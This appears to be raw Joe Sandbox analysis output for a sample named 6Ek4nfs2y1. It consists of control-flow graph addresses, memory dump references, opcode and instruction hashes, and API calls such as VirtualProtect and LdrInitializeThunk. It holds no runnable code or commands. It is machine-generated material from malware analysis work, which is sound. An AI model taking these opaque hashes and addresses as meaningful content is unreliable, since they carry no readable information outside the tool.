73 84df1ad-84df1c6 66->73 74 84df1a3 66->74 68 84df2bf-84df2d6 67->68 69 84df308-84df318 67->69 68->69 77 84df2d8-84df2e2 68->77 73->59 74->73 80 84df2f5-84df305 77->80 81 84df2e4-84df2f3 77->81 81->80
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID: d
                        • API String ID: 0-2564639436
                        • Opcode ID: 5236f0cb1bdaabb0d686453b1ece6362a14fc269f395604bfb6801ee3507a061
                        • Instruction ID: c65cf5e6a02942524904dbd0250f750ec5d8ce1f8cd287cdf607366375d7f41d
                        • Opcode Fuzzy Hash: 5236f0cb1bdaabb0d686453b1ece6362a14fc269f395604bfb6801ee3507a061
                        • Instruction Fuzzy Hash: 16D13834600705CFCB24DF29C894A6AB7F2FF89311B55C96AD85A9B361DB31F846CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 86 282feb8-282ff39 VirtualProtect 89 282ff42-282ff67 86->89 90 282ff3b-282ff41 86->90 90->89
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 0282FF2C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1288027920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2820000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 5942a5484762dd0452a9cb4c1daf7a111f921db2f24875f63c8f202837eeea37
                        • Instruction ID: 2bbf5e8a080e6e7602a62f3c0a27eeb958a880dedd8b30f8852d828f44787d16
                        • Opcode Fuzzy Hash: 5942a5484762dd0452a9cb4c1daf7a111f921db2f24875f63c8f202837eeea37
                        • Instruction Fuzzy Hash: 061102B5D043098FDB20DFAAC480BAEFBF5AB48320F14842AD519A7600CB75A944CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 94 84df460-84df488 96 84df48a-84df4d1 94->96 97 84df4d6-84df4e4 94->97 141 84df92d-84df934 96->141 98 84df4e6-84df4f1 97->98 99 84df4f3 97->99 100 84df4f5-84df4fc 98->100 99->100 103 84df5e5-84df5e9 100->103 104 84df502-84df506 100->104 106 84df63f-84df649 103->106 107 84df5eb-84df5fa 103->107 108 84df50c-84df510 104->108 109 84df935-84df95d 104->109 110 84df64b-84df65a 106->110 111 84df682-84df6a8 106->111 120 84df5fe-84df603 107->120 112 84df522-84df580 108->112 113 84df512-84df51c 108->113 114 84df964-84df98e 109->114 124 84df996-84df9ac 110->124 125 84df660-84df67d 110->125 137 84df6aa-84df6b3 111->137 138 84df6b5 111->138 151 84df586-84df5e0 112->151 152 84df9f3-84dfa1d 112->152 113->112 113->114 114->124 126 84df5fc 120->126 127 84df605-84df63a call 84df330 120->127 149 84df9b4-84df9ec 124->149 125->141 126->120 127->141 139 84df6b7-84df6df 137->139 138->139 155 84df6e5-84df6fe 139->155 156 84df7b0-84df7b4 139->156 149->152 151->141 161 84dfa1f-84dfa25 152->161 162 84dfa27-84dfa2d 152->162 155->156 181 84df704-84df713 155->181 159 84df82e-84df838 156->159 160 84df7b6-84df7cf 156->160 164 84df83a-84df844 159->164 165 84df895-84df89e 159->165 160->159 186 84df7d1-84df7e0 160->186 161->162 168 84dfa2e-84dfa6b 161->168 179 84df84a-84df85c 164->179 180 84df846-84df848 164->180 170 84df8d6-84df923 165->170 171 84df8a0-84df8ce 165->171 191 84df92b 170->191 171->170 187 84df85e-84df860 179->187 180->187 199 84df72b-84df740 181->199 200 84df715-84df71b 181->200 205 84df7f8-84df803 186->205 206 84df7e2-84df7e8 186->206 189 84df88e-84df893 187->189 190 84df862-84df866 187->190 189->164 189->165 195 84df868-84df881 190->195 196 84df884-84df887 190->196 191->141 195->196 196->189 203 84df774-84df77d 199->203 204 84df742-84df76e 199->204 207 84df71d 200->207 208 84df71f-84df721 200->208 203->152 212 84df783-84df7aa 203->212 204->149 204->203 205->152 209 84df809-84df82c 205->209 213 84df7ec-84df7ee 206->213 214 84df7ea 206->214 207->199 208->199 209->159 209->186 212->156 212->181 213->205 214->205
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 08b2986400211dccff811ae5d64f8989d15e9d072321214598a018aaee46fe19
                        • Instruction ID: cea37fa1c463081834ca9f4449a8b42f265ce57eed01b456d1871a2c2f04b722
                        • Opcode Fuzzy Hash: 08b2986400211dccff811ae5d64f8989d15e9d072321214598a018aaee46fe19
                        • Instruction Fuzzy Hash: 79127A71A00304DFCB24DFA4D494AAEB7F2FF88701B14856EE406AB751DB36AC4ACB50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 337 b9d030-b9d042 338 b9d048 337->338 339 b9d0d3-b9d0da 337->339 340 b9d04a-b9d056 338->340 339->340 341 b9d05c-b9d07e 340->341 342 b9d0df-b9d0e4 340->342 344 b9d0e9-b9d0fe 341->344 345 b9d080-b9d09b 341->345 342->341 349 b9d0b5-b9d0bd 344->349 348 b9d0a3-b9d0b3 345->348 348->349 350 b9d10b 348->350 351 b9d0bf-b9d0d0 349->351 352 b9d100-b9d109 349->352 352->351
                        Memory Dump Source
                        • Source File: 00000000.00000002.1287020749.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b9d000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 93e8a26b29689fb97c647ddd34bf8272e304a19b86eab0193b6ffd44bf110023
                        • Instruction ID: f372e6ed67824d4872232eb0391ce9986c70d0331ddb4c19518f30e33b13bb3e
                        • Opcode Fuzzy Hash: 93e8a26b29689fb97c647ddd34bf8272e304a19b86eab0193b6ffd44bf110023
                        • Instruction Fuzzy Hash: 512122B2504244DFDF15DF14D9C0B2ABBA5FB84310F24C6B9E8091B246C33AD806CAB2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 415 84df330-84df352 416 84df3f9-84df405 415->416 417 84df358-84df374 415->417 419 84df376-84df38a call 84df460 417->419 420 84df3d1-84df3f6 417->420 424 84df390-84df3ad 419->424 420->416 424->420 426 84df3af-84df3c9 424->426 426->420
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd8d39fdbc022f225556ad573a527b4df56084a739c74b7b5df661cb2d7cdc2f
                        • Instruction ID: c986e50df39c5ba83a0a52611dd6d9d50cdc00dec7948687e2d6856ccf0f9788
                        • Opcode Fuzzy Hash: fd8d39fdbc022f225556ad573a527b4df56084a739c74b7b5df661cb2d7cdc2f
                        • Instruction Fuzzy Hash: 6F212875A00209CFDB14DF94C591ADDB7F2BF88301F2041A9D405BB361DB76AD45CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 430 b9d006-b9d042 431 b9d048 430->431 432 b9d0d3-b9d0da 430->432 433 b9d04a-b9d056 431->433 432->433 434 b9d05c-b9d07e 433->434 435 b9d0df-b9d0e4 433->435 437 b9d0e9-b9d0fe 434->437 438 b9d080-b9d09b 434->438 435->434 442 b9d0b5-b9d0bd 437->442 441 b9d0a3-b9d0b3 438->441 441->442 443 b9d10b 441->443 444 b9d0bf-b9d0d0 442->444 445 b9d100-b9d109 442->445 445->444
                        Memory Dump Source
                        • Source File: 00000000.00000002.1287020749.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b9d000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00564a16fcbaf2b1af1e8f8da8b06295611bf26ba55885669f249136e30fdece
                        • Instruction ID: 8a6c4395af6605dfc6c76bedfd2d6028a4f4727ced753198f80227e7f22b98c0
                        • Opcode Fuzzy Hash: 00564a16fcbaf2b1af1e8f8da8b06295611bf26ba55885669f249136e30fdece
                        • Instruction Fuzzy Hash: 8A21517650D3C08FDB17CF20D990715BF71EB46214F2985EBD8898B6A7C339981ACB62

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 504 84ddef8-84ddf19 505 84ddf1b 504->505 506 84ddf20-84ddf76 504->506 505->506 511 84ddf7d-84ddf85 506->511
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cfbdbe95ccbfe2debe87c9169154dc5ae5649dedd26e5bc9163c6e2e288cc260
                        • Instruction ID: 10454a22874ef70fe4b81bd9fdf912989524845334bfa0eeade2e087058a4166
                        • Opcode Fuzzy Hash: cfbdbe95ccbfe2debe87c9169154dc5ae5649dedd26e5bc9163c6e2e288cc260
                        • Instruction Fuzzy Hash: BC11F7B4E002099FDB44EFA9C9457AEBBF1FF88700F60806A9418B7351DA749A41CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 512 b8d76d-b8d78d 513 b8d7dd-b8d7e5 512->513 514 b8d78f-b8d79a 512->514 513->514 515 b8d79c-b8d7aa 514->515 516 b8d7d2-b8d7d9 514->516 518 b8d7b0 515->518 516->515 521 b8d7db 516->521 520 b8d7b3-b8d7bb 518->520 522 b8d7cb-b8d7d0 520->522 523 b8d7bd-b8d7c5 520->523 521->520 522->523
                        Memory Dump Source
                        • Source File: 00000000.00000002.1286979882.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b8d000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b7f371e2e5b745afab92c741d99eebe4e6d3716a1f05ac419079e955b557661
                        • Instruction ID: 3cb5f38a33159fbbdf6d7859d811d1aa88d465254f8b276866218c3596deee5c
                        • Opcode Fuzzy Hash: 9b7f371e2e5b745afab92c741d99eebe4e6d3716a1f05ac419079e955b557661
                        • Instruction Fuzzy Hash: 7A01F7750043449BE7106A11D9C0766BBD8EF42324F18C4ABED094A1D6C2789C40CB72
                        Memory Dump Source
                        • Source File: 00000000.00000002.1286979882.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b8d000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50891d081f51f8b45f3af7134f2d92030577ab6b584e336105d20c1242ef9d80
                        • Instruction ID: de01c004adbf3bcf3e0c2aad3c44ef59f29cea9c0427d3ebca9f8c5fa723e456
                        • Opcode Fuzzy Hash: 50891d081f51f8b45f3af7134f2d92030577ab6b584e336105d20c1242ef9d80
                        • Instruction Fuzzy Hash: 80F0C2764053449EE7208A05D984B62FBD8EB41724F18C45AED488F696C2789C40CB71
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4d460be0f45d4127079dda6dc02760e9db4218f2c1a65852b9779be69b34029c
                        • Instruction ID: 2c186f5e64af42093b9e918bd8cd4d41daefbc8d0b0bf9b59b62acdc7d1d5e85
                        • Opcode Fuzzy Hash: 4d460be0f45d4127079dda6dc02760e9db4218f2c1a65852b9779be69b34029c
                        • Instruction Fuzzy Hash: C601F674A05928CFDB64EF28DD48AAAB3F5EB48702F1040EAE509A7B55DB345E81CF01
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb5298b37474ab4771ce028f79e9c87eeb6c70ccf8b943334b18e129ba9be5bd
                        • Instruction ID: 54e7081ea445d42f12aec42acb502c1f059086f06989b1d6993d53d911479a0f
                        • Opcode Fuzzy Hash: cb5298b37474ab4771ce028f79e9c87eeb6c70ccf8b943334b18e129ba9be5bd
                        • Instruction Fuzzy Hash: 0501D674A00628CFCB65DF28DA88A99B7F9EB48710F5050EAD50DAB754EB346F80CF10
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c8ff83b97163f45540e350d2aaecacd64f90e466e2e43e9389c1bb990d4e320
                        • Instruction ID: 200040415dbba539cae5ad80b3f36259ea6dbd7aed81bfbb1dbe858a0a74b6a2
                        • Opcode Fuzzy Hash: 9c8ff83b97163f45540e350d2aaecacd64f90e466e2e43e9389c1bb990d4e320
                        • Instruction Fuzzy Hash: FAF01574D08248EFCB80DFA9D950AADBBF8AB49211F14C0AAE858D7341D6359A11DF90
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction ID: 0fee265ad14522857b31acce3d592a96bd7593056ce683f855c364d4e0b6fe26
                        • Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction Fuzzy Hash: CEE0C974D48208EFCB84DFA8D94069DBFF4EB48311F10C0AA984893352D6359A51DF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7483a7da19840c63f206fec173a737fcee1ae63c4103609e1f480917e47cbb7e
                        • Instruction ID: 6554c4040a90f36afa505f1be7e280a67e9969f8124488ddac3531d3005a237e
                        • Opcode Fuzzy Hash: 7483a7da19840c63f206fec173a737fcee1ae63c4103609e1f480917e47cbb7e
                        • Instruction Fuzzy Hash: 13F03A74608529CFDB54EF28D948A8AB3F5EB4C700F1040E9A619A7795C7346F81CF11
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction ID: 4139ee5621c8293333513988a25786ee802fc4f1cb8beb9efcbeec250085bfa7
                        • Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction Fuzzy Hash: 2DE0ED74D44208EFCB84DFA8D99069DFBF4EB58300F10C1AAD81893351D6359A51DF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction ID: 76166f5803c7980f1f179dcfd3df5d3a7db2f6dfde13173b0be5b1bbc9c5a8c1
                        • Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction Fuzzy Hash: 9EE0C974D44208EFCB84DFA8D9406ADBBF4EB49300F10C0AA981893351DA359A55DF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction ID: e941a3edad1036d03fa51be13a90612ea4f4373cac4c18d83dc5853e1539be69
                        • Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
                        • Instruction Fuzzy Hash: 81E0ED74D04208EFCB84DFA9D94069DFBF4EB48311F10C0AAD908A3351D7759A52DF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 740992dac3547d2c7847d6fb169f3ddd517269c0d345330f5b3a1628a166626f
                        • Instruction ID: 9e8417be9ef203a0323defad0b3817a7011a7a4e8dfc89bd78a06af3137903a4
                        • Opcode Fuzzy Hash: 740992dac3547d2c7847d6fb169f3ddd517269c0d345330f5b3a1628a166626f
                        • Instruction Fuzzy Hash: 49E08674908208EBC744DFA5D95096DBFB8EB45301F10C0AEE84857341CA359A42DBA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e161cab6abb1c270adf59e2e06fc782b8d45d75c79075ce3e87aefeeb417b5c7
                        • Instruction ID: 87daba93e5ee3390c41929f530e794aec8bae53c4f77505554d164c26ae32190
                        • Opcode Fuzzy Hash: e161cab6abb1c270adf59e2e06fc782b8d45d75c79075ce3e87aefeeb417b5c7
                        • Instruction Fuzzy Hash: 24E01234D08208EBCB44DFA8D9506ACBBF4AB88201F10C0AAC81863381DA359A02DF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb7da8a6a70079f7549c20168a5ddaca7ee38c88fbe41286dfbc9438e1b8e627
                        • Instruction ID: bf2d8cd6d52c78e23e53ac9e0df53625dd9c28b28ed24ac413a1950c63458cdd
                        • Opcode Fuzzy Hash: eb7da8a6a70079f7549c20168a5ddaca7ee38c88fbe41286dfbc9438e1b8e627
                        • Instruction Fuzzy Hash: ACE01234948208DBCB54DF94ED916ADBFB9EB85305F1081AFC80817355DA315E46DF81
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de9ef9979efc4b83f85d66259b226f633eafcb5c4517dfdfb59960c5cf4af8f1
                        • Instruction ID: 339e125ecdbd71ab698238163d14ecd2d4d2afdea9fa381a6e46424e2fa3ea73
                        • Opcode Fuzzy Hash: de9ef9979efc4b83f85d66259b226f633eafcb5c4517dfdfb59960c5cf4af8f1
                        • Instruction Fuzzy Hash: B4C08C3048930483D5801B506A2C33A33FCC782312F442813950C013618A680060CA81
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 398e629816dd3586e562d14805b9c6ce23cd9cd6da940cd2304af188049e162a
                        • Instruction ID: a6902a1a29f3416a7290453784cf30535b4611035697a4bd12c70b157b7fa0cd
                        • Opcode Fuzzy Hash: 398e629816dd3586e562d14805b9c6ce23cd9cd6da940cd2304af188049e162a
                        • Instruction Fuzzy Hash: B8311E71D097948BD769CF2A8C5438ABFF6AF85200F04C0EBD44CAA266DB740A85CF11
                        Memory Dump Source
                        • Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37804a70b79628d4450ea9368107c35bb62d47f1f5e08ea7642d8ce3538d5a32
                        • Instruction ID: 79982edbd7d00baf16b9171cbbcf4e6272fc268b164f1efc8306d07f86c59232
                        • Opcode Fuzzy Hash: 37804a70b79628d4450ea9368107c35bb62d47f1f5e08ea7642d8ce3538d5a32
                        • Instruction Fuzzy Hash: 8E219B71D05618CBDB6CCF5B994439AFAF7AFC8211F04C0FAD50CA6254EB741A868F51

                        Execution Graph

                        Execution Coverage:14.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:3.1%
                        Total number of Nodes:127
                        Total number of Limit Nodes:11
                        execution_graph 31747 1583108 31748 1583126 31747->31748 31765 158a5d8 31748->31765 31769 158a5e8 31748->31769 31749 1583557 31773 158a740 31749->31773 31778 158a730 31749->31778 31750 158364c 31783 158a980 31750->31783 31788 158a971 31750->31788 31751 1583760 31794 158a9c0 31751->31794 31802 158aa08 31751->31802 31807 158a9f9 31751->31807 31752 15838ce 31812 158aa80 31752->31812 31817 158aa90 31752->31817 31753 15839e2 31766 158a5e8 GetSystemMetrics 31765->31766 31768 158a667 31766->31768 31768->31749 31770 158a62e GetSystemMetrics 31769->31770 31772 158a667 31770->31772 31772->31749 31774 158a74d 31773->31774 31822 158a7b8 31774->31822 31827 158a7a8 31774->31827 31775 158a778 31775->31750 31779 158a74d 31778->31779 31781 158a7b8 4 API calls 31779->31781 31782 158a7a8 4 API calls 31779->31782 31780 158a778 31780->31750 31781->31780 31782->31780 31785 158a98d 31783->31785 31784 158a9b7 31784->31751 31787 158a9c0 2 API calls 31785->31787 31864 158a9d0 31785->31864 31787->31784 31789 158a930 31788->31789 31791 158a97a 31788->31791 31789->31751 31790 158a9b7 31790->31751 31792 158a9d0 2 API calls 31791->31792 31793 158a9c0 2 API calls 31791->31793 31792->31790 31793->31790 31795 158a9cf 31794->31795 31799 158aa0f 31794->31799 31796 158a7f0 2 API calls 31795->31796 31797 158a9dd 31795->31797 31796->31797 31797->31752 31798 158aa3f 31798->31752 31867 158aa48 31799->31867 31871 158aa58 31799->31871 31803 158aa0f 31802->31803 31805 158aa58 2 API calls 31803->31805 31806 158aa48 2 API calls 31803->31806 31804 158aa3f 31804->31752 31805->31804 31806->31804 31808 158aa0f 31807->31808 31810 158aa58 2 API calls 31808->31810 31811 158aa48 2 API calls 31808->31811 31809 158aa3f 31809->31752 31810->31809 31811->31809 31813 158aa90 31812->31813 31874 158aae0 31813->31874 31877 158aad1 31813->31877 31814 158aac7 31814->31753 31819 158aa9d 31817->31819 31818 158aac7 31818->31753 31820 158aae0 2 API calls 31819->31820 31821 158aad1 2 API calls 31819->31821 31820->31818 31821->31818 31833 158a7f0 31822->31833 31842 158a880 31822->31842 31851 158a7e0 31822->31851 31823 158a7c6 31823->31775 31828 158a7b8 31827->31828 31830 158a7f0 2 API calls 31828->31830 31831 158a7e0 2 API calls 31828->31831 31832 158a880 2 API calls 31828->31832 31829 158a7c6 31829->31775 31830->31829 31831->31829 31832->31829 31834 158a7fd 31833->31834 31835 158a825 31833->31835 31834->31823 31860 1589dbc 31835->31860 31837 158a846 31837->31823 31838 158a8ab 31838->31823 31840 158a90e GlobalMemoryStatusEx 31841 158a93e 31840->31841 31841->31823 31843 158a829 31842->31843 31849 158a842 31842->31849 31844 158a89e 31843->31844 31846 1589dbc GlobalMemoryStatusEx 31843->31846 31843->31849 31844->31823 31845 158a90e GlobalMemoryStatusEx 31848 158a93e 31845->31848 31846->31849 31847 158a846 31847->31823 31848->31823 31849->31845 31849->31847 31850 158a8ab 31849->31850 31850->31823 31852 158a79f 31851->31852 31854 158a7ea 31851->31854 31852->31823 31853 158a7fd 31853->31823 31854->31853 31855 1589dbc GlobalMemoryStatusEx 31854->31855 31857 158a842 31855->31857 31856 158a846 31856->31823 31857->31856 31858 158a90e GlobalMemoryStatusEx 31857->31858 31859 158a93e 31858->31859 31859->31823 31861 158a8c8 GlobalMemoryStatusEx 31860->31861 31863 158a842 31861->31863 31863->31837 31863->31838 31863->31840 31865 158a7f0 2 API calls 31864->31865 31866 158a9dd 31865->31866 31866->31784 31868 158aa58 31867->31868 31869 158a7f0 2 API calls 31868->31869 31870 158aa65 31869->31870 31870->31798 31872 158a7f0 2 API calls 31871->31872 31873 158aa65 31872->31873 31873->31798 31875 158a7f0 2 API calls 31874->31875 31876 158aaed 31874->31876 31875->31876 31876->31814 31878 158a7f0 2 API calls 31877->31878 31879 158aaed 31878->31879 31879->31814 31880 6aed258 31881 6aed280 LdrInitializeThunk 31880->31881 31883 6aed2ee 31881->31883 31739 6b7dcb0 LdrInitializeThunk 31741 6b7dd0b 31739->31741 31740 6b7ddb0 31741->31740 31743 158dd60 31741->31743 31745 158dd8a 31743->31745 31744 158f67e 31744->31740 31745->31744 31746 158e635 LdrInitializeThunk 31745->31746 31746->31745 31884 6b7fc60 31886 6b7fc77 31884->31886 31885 6b7fc94 31886->31885 31889 6ae0040 31886->31889 31892 6ae0006 31886->31892 31890 6ae0054 LdrInitializeThunk 31889->31890 31891 6ae0080 31890->31891 31891->31885 31893 6ae0016 31892->31893 31894 6ae0054 LdrInitializeThunk 31892->31894 31893->31894 31895 6ae0080 31894->31895 31895->31885
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Y
                        • API String ID: 2994545307-3233089245
                        • Opcode ID: 0b619f981c82cd48a3d98b1c914d62b9038ff813a6a04b0d1837857d939afd06
                        • Instruction ID: 3ce19cd72fffba2ec682b517580ed24d37fc865a2780e67b82cb0d3a36c970db
                        • Opcode Fuzzy Hash: 0b619f981c82cd48a3d98b1c914d62b9038ff813a6a04b0d1837857d939afd06
                        • Instruction Fuzzy Hash: 36132B70D106198ECB25EF68C884AADF7B1FF99300F51C69AD558BB251EB70AAC5CF40

                        Control-flow Graph

                        • Executed
                        • Not Executed
